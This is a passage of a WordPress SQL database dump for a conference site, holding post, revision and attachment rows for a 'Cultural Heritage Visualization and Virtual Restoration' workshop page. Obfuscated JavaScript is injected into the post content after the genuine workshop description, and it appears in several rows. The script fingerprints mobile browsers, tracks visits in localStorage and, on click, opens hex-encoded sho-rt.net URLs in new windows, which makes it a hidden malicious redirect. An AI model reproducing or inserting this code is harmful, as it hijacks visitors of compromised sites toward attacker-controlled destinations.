_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','publish','closed','closed','','cultural-heritage-visualization-and-virtual-restoration','','','2023-03-01 23:21:49','2023-03-01 23:21:49','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3897',0,'dt_portfolio','',0),
(3898,1,'2023-03-01 22:35:20','2023-03-01 22:35:20','','28m1','','inherit','open','closed','','28m1','','','2023-03-01 22:35:20','2023-03-01 22:35:20','',3897,'https://gsw2023.com/wp-content/uploads/2023/03/28m1.jpg',0,'attachment','image/jpeg',0),
(3899,1,'2023-03-01 22:35:39','2023-03-01 22:35:39','<!-- wp:paragraph -->\n<p>Workshop of ISPRS WG IV/11</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:35:39','2023-03-01 22:35:39','',3897,'https://gsw2023.com/?p=3899',0,'revision','',0),
(3900,1,'2023-03-01 22:45:53','2023-03-01 22:45:53','','28m2jpg','','inherit','open','closed','','28m2jpg','','','2023-03-01 22:45:53','2023-03-01 22:45:53','',3897,'https://gsw2023.com/wp-content/uploads/2023/03/28m2jpg.jpg',0,'attachment','image/jpeg',0),
(3901,1,'2023-03-01 22:47:18','2023-03-01 22:47:18','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 